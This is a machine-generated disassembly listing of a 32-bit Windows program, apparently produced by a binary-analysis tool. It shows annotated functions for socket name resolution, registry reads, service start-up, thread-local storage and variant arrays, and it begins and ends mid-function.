00401A9D xor eax, eax xrefs 00401A6C
00401A9F pop edx
00401AA1 pop ecx Count = 2
00401AA2 mov dword ptr fs:[eax], edx
00401AA5 push 00401AC5h
00401AAA cmp byte ptr [0042C045h], 00000000h xrefs 00401AC3
00401AB1 je 00401ABDh
00401AB3 push 0042C5C4h
00401AB8 call 0040136Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
00401ABD ret xrefs 00401AB1 function end
Function 00413D24, API count: 6, instr count: 163
APIs
    • getaddrinfo.WS2_32, ref: 00413BEF
    • getaddrinfo.WS2_32, ref: 00413C32
    • getaddrinfo.WS2_32, ref: 00413C6B
    • getaddrinfo.WS2_32, ref: 00413C8E
    • FreeAddrInfoW.WS2_32, ref: 00413CCD
  • getprotobynumber.WS2_32, ref: 00413D9C
  • getservbyname.WS2_32, ref: 00413DB6
  • htons.WS2_32, ref: 00413DCB
  • inet_addr.WS2_32, ref: 00413E02
  • gethostbyname.WS2_32, ref: 00413E11
  • WSAGetLastError.WS2_32, ref: 00413E19
Address Instruction Meta Information
00413D24 push ebp xrefs 00418105
00413D25 mov ebp, esp
00413D27 add esp, FFFFFF78h
00413D2D push ebx
00413D2E push esi
00413D2F push edi
00413D30 mov dword ptr [ebp-08h], ecx
00413D33 mov dword ptr [ebp-04h], edx
00413D36 mov ebx, eax
00413D38 mov edi, dword ptr [ebp+10h]
00413D3B mov esi, dword ptr [ebp+14h]
00413D3E mov eax, dword ptr [ebp-04h]
00413D41 call 00404868h
00413D46 mov eax, dword ptr [ebp-08h]
00413D49 call 00404868h
00413D4E xor eax, eax
00413D50 push ebp
00413D51 push 00413F2Bh
00413D56 push dword ptr fs:[eax]
00413D59 mov dword ptr fs:[eax], esp
00413D5C xor eax, eax
00413D5E mov dword ptr [ebp-0Ch], eax
00413D61 mov eax, ebx
00413D63 xor ecx, ecx
00413D65 mov edx, 0000001Ch
00413D6A call 00403030h
00413D6F mov eax, esi
00413D71 call 00413B74h
00413D76 test al, al
00413D78 jne 00413E4Fh
00413D7E mov eax, dword ptr [0042C8A4h] 00960A4C
00413D83 call 00413914h
00413D88 xor edx, edx
00413D8A push ebp
00413D8B push 00413E48h
00413D90 push dword ptr fs:[edx]
00413D93 mov dword ptr fs:[edx], esp
00413D96 mov word ptr [ebx], 0002h
00413D9B push edi
00413D9C call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00413DA2 mov esi, eax
00413DA4 xor eax, eax
00413DA6 test esi, esi
00413DA8 je 00413DBCh
00413DAA mov eax, dword ptr [esi]
00413DAC push eax
00413DAD mov eax, dword ptr [ebp-08h]
00413DB0 call 00404878h
00413DB5 push eax
00413DB6 call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00413DBC test eax, eax xrefs 00413DA8
00413DBE jne 00413DD7h
00413DC0 xor edx, edx
00413DC2 mov eax, dword ptr [ebp-08h]
00413DC5 call 00407608h
00413DCA push eax
00413DCB call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00413DD1 mov word ptr [ebx+02h], ax
00413DD5 jmp 00413DDFh
00413DD7 mov ax, word ptr [eax+08h] xrefs 00413DBE
00413DDB mov word ptr [ebx+02h], ax
00413DDF mov eax, dword ptr [ebp-04h] xrefs 00413DD5
00413DE2 mov edx, 00413F48h
00413DE7 call 004047C4h
00413DEC jne 00413DF7h
00413DEE mov dword ptr [ebx+04h], FFFFFFFFh
00413DF5 jmp 00413E30h
00413DF7 mov eax, dword ptr [ebp-04h] xrefs 00413DEC
00413DFA call 00404878h
00413DFF mov edi, eax
00413E01 push edi
00413E02 call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00413E08 mov esi, eax
00413E0A mov dword ptr [ebx+04h], esi
00413E0D inc esi
00413E0E jne 00413E30h
00413E10 push edi
00413E11 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
00413E17 mov esi, eax
00413E19 call dword ptr [0042B3D0h] WSAGetLastError@WS2_32.DLL (Hidden Import)
00413E1F mov dword ptr [ebp-0Ch], eax
00413E22 test esi, esi
00413E24 je 00413E30h
00413E26 mov eax, dword ptr [esi+0Ch]
00413E2B mov eax, dword ptr [eax] Count = 2
00413E2D mov dword ptr [ebx+04h], eax
00413E30 xor eax, eax xrefs 00413E0E, 00413E24, 00413DF5
00413E32 pop edx
00413E34 pop ecx Count = 2
00413E35 mov dword ptr fs:[eax], edx
00413E38 push 00413F10h
00413E3D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00413E4D
00413E42 call 0041391Ch
00413E47 ret function end
00413E4F lea eax, dword ptr [ebp-30h] xrefs 00413D78
00413E52 xor ecx, ecx
00413E54 mov edx, 00000020h
00413E59 call 00403030h
00413E5E lea eax, dword ptr [ebp-50h]
00413E61 xor ecx, ecx
00413E63 mov edx, 00000020h
00413E68 call 00403030h
00413E6D mov byte ptr [ebp-0Dh], 00000000h
00413E71 test esi, esi
00413E73 jne 00413EA3h
00413E75 cmp byte ptr [ebp+08h], 00000000h
00413E79 je 00413E8Fh
00413E7B mov dword ptr [ebp-2Ch], 00000002h
00413E82 mov dword ptr [ebp-4Ch], 00000017h
00413E89 mov byte ptr [ebp-0Dh], 00000001h
00413E8D jmp 00413EA6h
00413E8F mov dword ptr [ebp-4Ch], 00000002h xrefs 00413E79
00413E96 mov dword ptr [ebp-2Ch], 00000017h
00413E9D mov byte ptr [ebp-0Dh], 00000001h
00413EA1 jmp 00413EA6h
00413EA3 mov dword ptr [ebp-2Ch], esi xrefs 00413E73
00413EA6 mov eax, dword ptr [ebp+0Ch] xrefs 00413EA1, 00413E8D
00413EA9 mov dword ptr [ebp-28h], eax
00413EAC mov eax, edi
00413EAE mov dword ptr [ebp-24h], eax
00413EB1 mov edx, dword ptr [ebp-28h]
00413EB4 mov dword ptr [ebp-48h], edx
00413EB7 mov dword ptr [ebp-44h], eax
00413EBA lea eax, dword ptr [ebp-6Ch]
00413EBD push eax
00413EBE lea ecx, dword ptr [ebp-30h]
00413EC1 mov edx, dword ptr [ebp-08h]
00413EC4 mov eax, dword ptr [ebp-04h]
00413EC7 call 00413B90h
00413ECC mov dword ptr [ebp-0Ch], eax
00413ECF mov edi, ebx
00413ED1 lea esi, dword ptr [ebp-6Ch]
00413ED4 mov ecx, 00000007h
00413ED9 rep movsd
00413EDB test eax, eax
00413EDD je 00413F10h
00413EDF cmp byte ptr [ebp-0Dh], 00000000h
00413EE3 je 00413F10h
00413EE5 lea eax, dword ptr [ebp-00000088h]
00413EEB push eax
00413EEC lea ecx, dword ptr [ebp-50h]
00413EEF mov edx, dword ptr [ebp-08h]
00413EF2 mov eax, dword ptr [ebp-04h]
00413EF5 call 00413B90h
00413EFA mov dword ptr [ebp-0Ch], eax
00413EFD test eax, eax
00413EFF jne 00413F10h
00413F01 mov edi, ebx
00413F03 lea esi, dword ptr [ebp-00000088h]
00413F09 mov ecx, 00000007h
00413F0E rep movsd
00413F10 xor eax, eax xrefs 00413EDD, 00413EE3, 00413EFF
00413F12 pop edx
00413F14 pop ecx Count = 2
00413F15 mov dword ptr fs:[eax], edx
00413F18 push 00413F32h
00413F1D lea eax, dword ptr [ebp-08h] xrefs 00413F30
00413F20 mov edx, 00000002h
00413F25 call 00404400h
00413F2A ret function end
Function 004035A8, API count: 3, instr count: 49
APIs
  • RegOpenKeyExA.ADVAPI32, ref: 004035CA
  • RegQueryValueExA.ADVAPI32, ref: 004035FD
  • RegCloseKey.ADVAPI32, ref: 00403613
Strings
  • FPUMaskValue, va: 0040365C
Address Instruction Meta Information
004035A8 push ebp xrefs 00405EE2
004035A9 mov ebp, esp
004035AB add esp, FFFFFFF4h
004035AE movzx eax, word ptr [0042B024h]
004035B5 mov dword ptr [ebp-08h], eax
004035B8 lea eax, dword ptr [ebp-04h]
004035BB push eax
004035BC push 00000001h
004035BE push 00000000h
004035C0 push 00403640h
004035C5 push 80000002h
004035CA call 004012B0h RegOpenKeyExA@ADVAPI32.DLL (Hidden Import)
004035CF test eax, eax
004035D1 jne 00403620h
004035D3 xor eax, eax
004035D5 push ebp
004035D6 push 00403619h
004035DB push dword ptr fs:[eax]
004035DE mov dword ptr fs:[eax], esp
004035E1 mov dword ptr [ebp-0Ch], 00000004h
004035E8 lea eax, dword ptr [ebp-0Ch]
004035EB push eax
004035EC lea eax, dword ptr [ebp-08h]
004035EF push eax
004035F2 push 00000000h Count = 2
004035F4 push 0040365Ch ASCII "FPUMaskValue"
004035F9 mov eax, dword ptr [ebp-04h]
004035FC push eax
004035FD call 004012B8h RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
00403602 xor eax, eax
00403604 pop edx
00403606 pop ecx Count = 2
00403607 mov dword ptr fs:[eax], edx
0040360A push 00403620h
0040360F mov eax, dword ptr [ebp-04h] xrefs 0040361E
00403612 push eax
00403613 call 004012A8h RegCloseKey@ADVAPI32.DLL (Import)
00403618 ret function end
00403620 mov ax, word ptr [0042B024h] 1332 xrefs 004035D1
00403626 and ax, 0000FFC0h
0040362A mov dx, word ptr [ebp-08h]
0040362E and dx, 003Fh
00403632 or ax, dx
00403635 mov word ptr [0042B024h], ax
0040363B mov esp, ebp
0040363D pop ebp
0040363E ret function end
Function 00412F24, API count: 1, instr count: 3
APIs
  • InterlockedIncrement.KERNEL32, ref: 00412F29
Address Instruction Meta Information
00412F24 push 0042C878h xrefs 004131BB
00412F29 call 0040616Ch InterlockedIncrement@KERNEL32.DLL (Hidden Import)
00412F2E ret function end
Function 00418190, API count: 0, instr count: 19
Address Instruction Meta Information
00418190 push ebx xrefs 00418117, 00419A29, 00419A41
00418191 push esi
00418192 push edi
00418193 add esp, FFFFFFE4h
00418196 mov esi, edx
00418198 lea edi, dword ptr [esp]
0041819B push ecx
0041819C mov ecx, 00000007h
004181A1 rep movsd
004181A3 pop ecx
004181A4 mov ebx, ecx
004181A6 mov edx, ebx
004181A8 mov eax, esp
004181AA call 00413F58h
004181AF add esp, 1Ch
004181B2 pop edi
004181B3 pop esi
004181B4 pop ebx
004181B5 ret function end
Function 00414038, API count: 2, instr count: 22
APIs
  • htons.WS2_32, ref: 00414056
  • htons.WS2_32, ref: 00414067
Address Instruction Meta Information
00414038 push esi xrefs 004181CB
00414039 push edi
0041403A add esp, FFFFFFE4h
0041403D mov esi, eax
0041403F lea edi, dword ptr [esp]
00414042 mov ecx, 00000007h
00414047 rep movsd
00414049 cmp word ptr [esp], 0017h
0041404E jne 00414061h
00414050 mov ax, word ptr [esp+02h]
00414055 push eax
00414056 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041405C movzx eax, ax
0041405F jmp 00414070h
00414061 mov ax, word ptr [esp+02h] xrefs 0041404E
00414066 push eax
00414067 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041406D movzx eax, ax
00414070 add esp, 1Ch xrefs 0041405F
00414073 pop edi
00414074 pop esi
00414075 ret function end
Function 00405FEC, API count: 1, instr count: 21
APIs
    • TlsSetValue.KERNEL32, ref: 00405FE5
  • TlsGetValue.KERNEL32, ref: 00406022
Address Instruction Meta Information
00405FEC mov cl, byte ptr [0042C65Ch] 00 xrefs 00402813, 004027B8, 00413679, 004027F3, 0040275A, 00402768, 00402776, 00402871, 0040287C, 00403BA8, 00403DEB, 00403BD5, 00403D31, 00403D5D, 00403E34
00405FF2 mov eax, dword ptr [0042B0C4h] 00000000
00405FF7 test cl, cl
00405FF9 jne 00406021h
00405FFB mov edx, dword ptr fs:[0000002Ch]
00406002 mov eax, dword ptr [edx+eax*4]
00406005 ret function end
00406006 call 00405FA8h xrefs 00406029
0040600B mov eax, dword ptr [0042B0C4h] 00000000
00406010 push eax
00406011 call 00405F84h
00406016 test eax, eax
00406018 je 0040601Bh
0040601A ret function end
0040601B mov eax, dword ptr [0042C668h] 00000000 xrefs 00406018
00406020 ret function end
00406021 push eax xrefs 00405FF9
00406022 call 00405F84h TlsGetValue@KERNEL32.DLL (Hidden Import)
00406027 test eax, eax
00406029 je 00406006h
0040602B ret function end
Function 004078D0, API count: 1, instr count: 27
APIs
  • SetFilePointer.KERNEL32, ref: 004078F2
Address Instruction Meta Information
004078D0 push ebp xrefs 004121EA
004078D1 mov ebp, esp
004078D3 add esp, FFFFFFF8h
004078D6 push ebx
004078D7 push esi
004078D8 mov esi, edx
004078DA mov ebx, eax
004078DC mov eax, dword ptr [ebp+08h]
004078DF mov dword ptr [ebp-08h], eax
004078E2 mov eax, dword ptr [ebp+0Ch]
004078E5 mov dword ptr [ebp-04h], eax
004078E8 push esi
004078E9 lea eax, dword ptr [ebp-04h]
004078EC push eax
004078ED mov eax, dword ptr [ebp-08h]
004078F0 push eax
004078F1 push ebx
004078F2 call 00406284h SetFilePointer@KERNEL32.DLL (Hidden Import)
004078F7 mov dword ptr [ebp-08h], eax
004078FA mov eax, dword ptr [ebp-08h]
004078FD mov edx, dword ptr [ebp-04h]
00407900 pop esi
00407901 pop ebx
00407903 pop ecx Count = 2
00407904 pop ebp
00407905 retn 0008h function end
Function 00412F18, API count: 1, instr count: 4
APIs
  • SetEvent.KERNEL32, ref: 00412F1E
Address Instruction Meta Information
00412F18 mov eax, dword ptr [0042C848h] 00000048 xrefs 00413159, 0041340E
00412F1D push eax
00412F1E call 0040627Ch SetEvent@KERNEL32.DLL (Hidden Import)
00412F23 ret function end
Function 00413A60, API count: 1, instr count: 37
APIs
  • gethostname.WS2_32, ref: 00413A9D
Address Instruction Meta Information
00413A60 push ebp xrefs 00419785
00413A61 mov ebp, esp
00413A63 push 00000000h
00413A65 push ebx
00413A66 mov ebx, eax
00413A68 xor eax, eax
00413A6A push ebp
00413A6B push 00413ACAh
00413A70 push dword ptr fs:[eax]
00413A73 mov dword ptr fs:[eax], esp
00413A76 mov eax, ebx
00413A78 call 004043DCh
00413A7D lea eax, dword ptr [ebp-04h]
00413A80 mov edx, 000000FFh
00413A85 call 004049A8h
00413A8A mov eax, dword ptr [ebp-04h]
00413A8D call 00404678h
00413A92 dec eax
00413A93 push eax
00413A94 mov eax, dword ptr [ebp-04h]
00413A97 call 00404878h
00413A9C push eax
00413A9D call dword ptr [0042B3ECh] gethostname@WS2_32.DLL (Hidden Import)
00413AA3 mov eax, dword ptr [ebp-04h]
00413AA6 call 00404878h
00413AAB mov edx, eax
00413AAD mov eax, ebx
00413AAF call 004045D4h
00413AB4 xor eax, eax
00413AB6 pop edx
00413AB8 pop ecx Count = 2
00413AB9 mov dword ptr fs:[eax], edx
00413ABC push 00413AD1h
00413AC1 lea eax, dword ptr [ebp-04h] xrefs 00413ACF
00413AC4 call 004043DCh
00413AC9 ret function end
Function 004130DC, API count: 0, instr count: 52
Address Instruction Meta Information
004130DC push ebp
004130DD mov ebp, esp
004130DF push ecx
004130E0 push ebx
004130E1 push esi
004130E2 push edi
004130E3 mov dword ptr [ebp-04h], eax
004130E6 xor eax, eax
004130E8 push ebp
004130E9 push 00413172h
004130EE push dword ptr fs:[eax]
004130F1 mov dword ptr fs:[eax], esp
004130F4 mov eax, dword ptr [ebp-04h]
004130F7 cmp byte ptr [eax+0Dh], 00000000h
004130FB jne 00413132h
004130FD xor eax, eax
004130FF push ebp
00413100 push 0041311Dh
00413105 push dword ptr fs:[eax]
00413108 mov dword ptr fs:[eax], esp
0041310B mov eax, dword ptr [ebp-04h]
0041310E mov edx, dword ptr [eax]
00413110 call dword ptr [edx+04h]
00413113 xor eax, eax
00413115 pop edx
00413117 pop ecx Count = 2
00413118 mov dword ptr fs:[eax], edx
0041311B jmp 00413132h
00413132 xor eax, eax xrefs 004130FB, 0041311B
00413134 pop edx
00413136 pop ecx Count = 2
00413137 mov dword ptr fs:[eax], edx
0041313A push 00413179h
0041313F mov eax, dword ptr [ebp-04h] xrefs 00413177
00413142 mov bl, byte ptr [eax+0Fh]
00413145 mov eax, dword ptr [ebp-04h]
00413148 mov esi, dword ptr [eax+14h]
0041314B mov eax, dword ptr [ebp-04h]
0041314E mov edx, dword ptr [eax]
00413150 call dword ptr [edx]
00413152 mov eax, dword ptr [ebp-04h]
00413155 mov byte ptr [eax+10h], 00000001h
00413159 call 00412F18h
0041315E test bl, bl
00413160 je 0041316Ah
00413162 mov eax, dword ptr [ebp-04h]
00413165 call 00403708h
0041316A mov eax, esi xrefs 00413160
0041316C call 004043D4h
00413171 ret function end
Function 00405990, API count: 1, instr count: 8
APIs
  • InterlockedIncrement.KERNEL32, ref: 0040599A
Address Instruction Meta Information
00405990 push ebp
00405991 mov ebp, esp
00405993 mov eax, dword ptr [ebp+08h]
00405996 add eax, 04h
00405999 push eax
0040599A call 004012E8h InterlockedIncrement@KERNEL32.DLL (Hidden Import)
0040599F pop ebp
004059A0 retn 0004h function end
Function 0040BC0C, API count: 2, instr count: 16
APIs
  • GetModuleHandleA.KERNEL32, ref: 0040BC12
  • GetProcAddress.KERNEL32, ref: 0040BC23
Strings
  • kernel32.dll, va: 0040BC44
  • GetDiskFreeSpaceExA, va: 0040BC54
Address Instruction Meta Information
0040BC0C push ebx xrefs 0040C530
0040BC0D push 0040BC44h ASCII "kernel32.dll"
0040BC12 call 004061CCh GetModuleHandleA@KERNEL32.DLL (Hidden Import)
0040BC17 mov ebx, eax
0040BC19 test ebx, ebx
0040BC1B je 0040BC2Dh
0040BC1D push 0040BC54h ASCII "GetDiskFreeSpaceExA"
0040BC22 push ebx
0040BC23 call 004061D4h GetProcAddress@KERNEL32.DLL (Import)
0040BC28 mov dword ptr [0042B154h], eax
0040BC2D cmp dword ptr [0042B154h], 00000000h xrefs 0040BC1B
0040BC34 jne 0040BC40h
0040BC36 mov eax, 00407A4Ch
0040BC3B mov dword ptr [0042B154h], eax
0040BC40 pop ebx xrefs 0040BC34
0040BC41 ret function end
Function 00429B14, API count: 3, instr count: 60
APIs
  • OpenServiceA.ADVAPI32, ref: 00429B39
  • StartServiceA.ADVAPI32, ref: 00429B4D
  • QueryServiceStatus.ADVAPI32, ref: 00429B5C
Address Instruction Meta Information
00429B14 push ebx xrefs 00429EDD
00429B15 push esi
00429B16 push edi
00429B17 add esp, FFFFFFE0h
00429B1A mov esi, eax
00429B1C mov dword ptr [esp+08h], 00000001h
00429B24 push 00000001h
00429B28 push 00000000h Count = 2
00429B2A call 00421BC4h
00429B2F mov ebx, eax
00429B31 test ebx, ebx
00429B33 jle 00429B9Dh
00429B35 push 00000014h
00429B37 push esi
00429B38 push ebx
00429B39 call 00421B6Ch OpenServiceA@ADVAPI32.DLL (Hidden Import)
00429B3E mov esi, eax
00429B40 test esi, esi
00429B42 jle 00429B97h
00429B44 xor eax, eax
00429B46 mov dword ptr [esp], eax
00429B49 push esp
00429B4A push 00000000h
00429B4C push esi
00429B4D call 00421B74h StartServiceA@ADVAPI32.DLL (Hidden Import)
00429B52 test al, al
00429B54 je 00429B91h
00429B56 lea eax, dword ptr [esp+04h]
00429B5A push eax
00429B5B push esi
00429B5C call 00421BACh QueryServiceStatus@ADVAPI32.DLL (Hidden Import)
00429B61 test al, al
00429B63 je 00429B91h
00429B65 jmp 00429B8Ah
00429B67 mov edi, dword ptr [esp+18h] xrefs 00429B8F
00429B6B mov eax, dword ptr [esp+1Ch]
00429B6F push eax
00429B70 call 00421B84h
00429B75 lea eax, dword ptr [esp+04h]
00429B79 push eax
00429B7A push esi
00429B7B call 00421BACh
00429B80 test al, al
00429B82 je 00429B91h
00429B84 cmp edi, dword ptr [esp+18h]
00429B88 jnle 00429B91h
00429B8A cmp dword ptr [esp+08h], 04h xrefs 00429B65
00429B8F jne 00429B67h
00429B91 push esi xrefs 00429B54, 00429B63, 00429B82, 00429B88
00429B92 call 00421B64h
00429B97 push ebx xrefs 00429B42
00429B98 call 00421B64h
00429B9D cmp dword ptr [esp+08h], 04h xrefs 00429B33
00429BA2 sete al
00429BA5 add esp, 20h
00429BA8 pop edi
00429BA9 pop esi
00429BAA pop ebx
00429BAB ret function end
Function 0041D004, API count: 0, instr count: 43
Address Instruction Meta Information
0041D004 push ebx xrefs 0041D0D9, 0041D0A2
0041D005 push esi
0041D006 push edi
0041D007 push ecx
0041D008 mov byte ptr [esp], dl
0041D00B mov esi, eax
0041D00D xor ebx, ebx
0041D00F mov eax, dword ptr [esi+1Ch]
0041D012 mov edx, dword ptr [eax]
0041D014 call dword ptr [edx+10h]
0041D017 mov ecx, 0041D088h
0041D01C mov edx, dword ptr [esi+0Ch]
0041D01F mov eax, dword ptr [esi+1Ch]
0041D022 call 0041836Ch
0041D027 mov eax, dword ptr [esi+1Ch]
0041D02A cmp dword ptr [eax+000001B8h], 00000000h
0041D031 jne 0041D079h
0041D033 mov ecx, dword ptr [esi+08h]
0041D036 mov edx, dword ptr [esi+04h]
0041D039 mov edi, dword ptr [eax]
0041D03B call dword ptr [edi+18h]
0041D03E mov eax, dword ptr [esi+1Ch]
0041D041 cmp dword ptr [eax+000001B8h], 00000000h
0041D048 jne 0041D079h
0041D04A cmp byte ptr [esp], 00000000h
0041D04E je 0041D061h
0041D050 call 0041C0D8h
0041D055 mov eax, dword ptr [esi+1Ch]
0041D058 cmp dword ptr [eax+000001B8h], 00000000h
0041D05F jne 0041D079h
0041D061 lea eax, dword ptr [esi+24h] xrefs 0041D04E
0041D064 mov edx, dword ptr [esi+04h]
0041D067 call 00404430h
0041D06C lea eax, dword ptr [esi+28h]
0041D06F mov edx, dword ptr [esi+08h]
0041D072 call 00404430h
0041D077 mov bl, 01h
0041D079 mov eax, ebx xrefs 0041D031, 0041D048, 0041D05F
0041D07B pop edx
0041D07C pop edi
0041D07D pop esi
0041D07E pop ebx
0041D07F ret function end
Function 0040DBB4, API count: 1, instr count: 139
APIs
  • 77124CFD.OLEAUT32, ref: 0040DD6D
Address Instruction Meta Information
0040DBB4 push ebp xrefs 0040DDFD
0040DBB5 mov ebp, esp
0040DBB7 add esp, FFFFFCE0h
0040DBBD push ebx
0040DBBE push esi
0040DBBF push edi
0040DBC0 mov dword ptr [ebp-00000308h], ecx
0040DBC6 mov ebx, edx
0040DBC8 mov dword ptr [ebp-00000304h], eax
0040DBCE test byte ptr [ebx+01h], 00000020h
0040DBD2 jne 0040DBDEh
0040DBD4 mov eax, 80070057h
0040DBD9 call 0040D7F4h
0040DBDE mov ax, word ptr [ebx] xrefs 0040DBD2
0040DBE1 mov edx, eax
0040DBE3 and dx, 0FFFh
0040DBE8 cmp dx, 000Ch
0040DBEC jne 0040DD65h
0040DBF2 test ah, 00000040h
0040DBF5 je 0040DC04h
0040DBF7 mov eax, dword ptr [ebx+08h]
0040DBFA mov eax, dword ptr [eax]
0040DBFC mov dword ptr [ebp-00000314h], eax
0040DC02 jmp 0040DC0Dh
0040DC04 mov eax, dword ptr [ebx+08h] xrefs 0040DBF5
0040DC07 mov dword ptr [ebp-00000314h], eax
0040DC0D mov eax, dword ptr [ebp-00000314h] xrefs 0040DC02
0040DC13 movzx eax, word ptr [eax]
0040DC16 mov dword ptr [ebp-00000310h], eax
0040DC1C mov ebx, dword ptr [ebp-00000310h]
0040DC22 dec ebx
0040DC23 test ebx, ebx
0040DC25 jl 0040DC92h
0040DC27 inc ebx
0040DC28 xor edi, edi
0040DC2A lea esi, dword ptr [ebp-00000300h]
0040DC30 mov eax, esi xrefs 0040DC90
0040DC32 mov dword ptr [ebp-00000320h], eax
0040DC38 mov eax, dword ptr [ebp-00000320h]
0040DC3E add eax, 04h
0040DC41 push eax
0040DC42 lea eax, dword ptr [edi+01h]
0040DC45 push eax
0040DC46 mov eax, dword ptr [ebp-00000314h]
0040DC4C push eax
0040DC4D call 0040CA04h
0040DC52 call 0040D7F4h
0040DC57 lea eax, dword ptr [ebp-0000030Ch]
0040DC5D push eax
0040DC5E lea eax, dword ptr [edi+01h]
0040DC61 push eax
0040DC62 mov eax, dword ptr [ebp-00000314h]
0040DC68 push eax
0040DC69 call 0040CA0Ch
0040DC6E call 0040D7F4h
0040DC73 mov eax, dword ptr [ebp-00000320h]
0040DC79 mov edx, dword ptr [ebp-0000030Ch]
0040DC7F sub edx, dword ptr [eax+04h]
0040DC82 inc edx
0040DC83 mov eax, dword ptr [ebp-00000320h]
0040DC89 mov dword ptr [eax], edx
0040DC8B inc edi
0040DC8C add esi, 08h
0040DC8F dec ebx
0040DC90 jne 0040DC30h
0040DC92 lea eax, dword ptr [ebp-00000300h] xrefs 0040DC25
0040DC98 push eax
0040DC99 mov eax, dword ptr [ebp-00000310h]
0040DC9F push eax
0040DCA0 push 0000000Ch
0040DCA2 call 0040C9FCh
0040DCA7 mov esi, eax
0040DCA9 test esi, esi
0040DCAB jne 0040DCB2h
0040DCAD call 0040D54Ch
0040DCB2 mov eax, dword ptr [ebp-00000304h] xrefs 0040DCAB
0040DCB8 call 0040DB0Ch
0040DCBD mov eax, dword ptr [ebp-00000304h]
0040DCC3 mov word ptr [eax], 200Ch
0040DCC8 mov eax, dword ptr [ebp-00000304h]
0040DCCE mov dword ptr [eax+08h], esi
0040DCD1 mov ebx, dword ptr [ebp-00000310h]
0040DCD7 dec ebx
0040DCD8 test ebx, ebx
0040DCDA jl 0040DCF6h
0040DCDC inc ebx
0040DCDD lea eax, dword ptr [ebp-000002FCh]
0040DCE3 lea edx, dword ptr [ebp-00000100h]
0040DCE9 mov ecx, dword ptr [eax] xrefs 0040DCF4
0040DCEB mov dword ptr [edx], ecx
0040DCED add edx, 04h
0040DCF0 add eax, 08h
0040DCF3 dec ebx
0040DCF4 jne 0040DCE9h
0040DCF6 push ebp xrefs 0040DCDA, 0040DD61
0040DCF7 mov ebx, dword ptr [ebp-00000310h]
0040DCFD dec ebx
0040DCFE mov eax, ebx
0040DD00 call 0040DB28h
0040DD05 pop ecx
0040DD06 test al, al
0040DD08 je 0040DD56h
0040DD0A lea eax, dword ptr [ebp-00000318h]
0040DD10 push eax
0040DD11 lea eax, dword ptr [ebp-00000100h]
0040DD17 push eax
0040DD18 mov eax, dword ptr [ebp-00000314h]
0040DD1E push eax
0040DD1F call 0040CA14h
0040DD24 call 0040D7F4h
0040DD29 lea eax, dword ptr [ebp-0000031Ch]
0040DD2F push eax
0040DD30 lea eax, dword ptr [ebp-00000100h]
0040DD36 push eax
0040DD37 push esi
0040DD38 call 0040CA14h
0040DD3D call 0040D7F4h
0040DD42 mov eax, dword ptr [ebp-00000318h]
0040DD48 mov edx, eax
0040DD4A mov eax, dword ptr [ebp-0000031Ch]
0040DD50 call dword ptr [ebp-00000308h]
0040DD56 push ebp xrefs 0040DD08
0040DD57 mov eax, ebx
0040DD59 call 0040DB58h
0040DD5E pop ecx
0040DD5F test al, al
0040DD61 jne 0040DCF6h
0040DD63 jmp 0040DD77h
0040DD65 push ebx xrefs 0040DBEC
0040DD66 mov eax, dword ptr [ebp-00000304h]
0040DD6C push eax
0040DD6D call 0040C5A8h 77124CFD@OLEAUT32.DLL (Import)
0040DD72 call 0040D7F4h
0040DD77 pop edi xrefs 0040DD63
0040DD78 pop esi
0040DD79 pop ebx
0040DD7A mov esp, ebp
0040DD7C pop ebp
0040DD7D ret function end
Function 00414314, API count: 7, instr count: 119
APIs
  • getprotobynumber.WS2_32, ref: 00414363
  • getservbyname.WS2_32, ref: 0041437D
  • htons.WS2_32, ref: 0041439C
  • getaddrinfo.WS2_32, ref: 0041440F
  • htons.WS2_32, ref: 00414433
  • htons.WS2_32, ref: 00414451
  • FreeAddrInfoW.WS2_32, ref: 00414472
Address Instruction Meta Information
00414314 push ebp xrefs 0041993D
00414315 mov ebp, esp
00414317 add esp, FFFFFFD4h
0041431A push ebx
0041431B push esi
0041431C mov ebx, ecx
0041431E mov esi, edx
00414320 mov dword ptr [ebp-04h], eax
00414323 mov eax, dword ptr [ebp-04h]
00414326 call 00404868h
0041432B xor eax, eax
0041432D push ebp
0041432E push 00414496h
00414333 push dword ptr fs:[eax]
00414336 mov dword ptr fs:[eax], esp
00414339 mov word ptr [ebp-06h], 0000h
0041433F mov eax, esi
00414341 call 00413B74h
00414346 test al, al
00414348 jne 004143C5h
0041434A mov eax, dword ptr [0042C8A4h] 00960A4C
0041434F call 00413914h
00414354 xor edx, edx
00414356 push ebp
00414357 push 004143BEh
0041435C push dword ptr fs:[edx]
0041435F mov dword ptr fs:[edx], esp
00414362 push ebx
00414363 call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00414369 mov ebx, eax
0041436B xor eax, eax
0041436D test ebx, ebx
0041436F je 00414383h
00414371 mov eax, dword ptr [ebx]
00414373 push eax
00414374 mov eax, dword ptr [ebp-04h]
00414377 call 00404878h
0041437C push eax
0041437D call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00414383 test eax, eax xrefs 0041436F
00414385 jne 00414397h
00414387 xor edx, edx
00414389 mov eax, dword ptr [ebp-04h]
0041438C call 00407608h
00414391 mov word ptr [ebp-06h], ax
00414395 jmp 004143A6h
00414397 mov ax, word ptr [eax+08h] xrefs 00414385
0041439B push eax
0041439C call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
004143A2 mov word ptr [ebp-06h], ax
004143A6 xor eax, eax xrefs 00414395
004143A8 pop edx
004143AA pop ecx Count = 2
004143AB mov dword ptr fs:[eax], edx
004143AE push 00414480h
004143B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004143C3
004143B8 call 0041391Ch
004143BD ret function end
004143C5 xor eax, eax xrefs 00414348
004143C7 mov dword ptr [ebp-0Ch], eax
004143CA xor edx, edx
004143CC push ebp
004143CD push 00414479h
004143D2 push dword ptr fs:[edx]
004143D5 mov dword ptr fs:[edx], esp
004143D8 lea eax, dword ptr [ebp-2Ch]
004143DB xor ecx, ecx
004143DD mov edx, 00000020h
004143E2 call 00403030h
004143E7 xor eax, eax
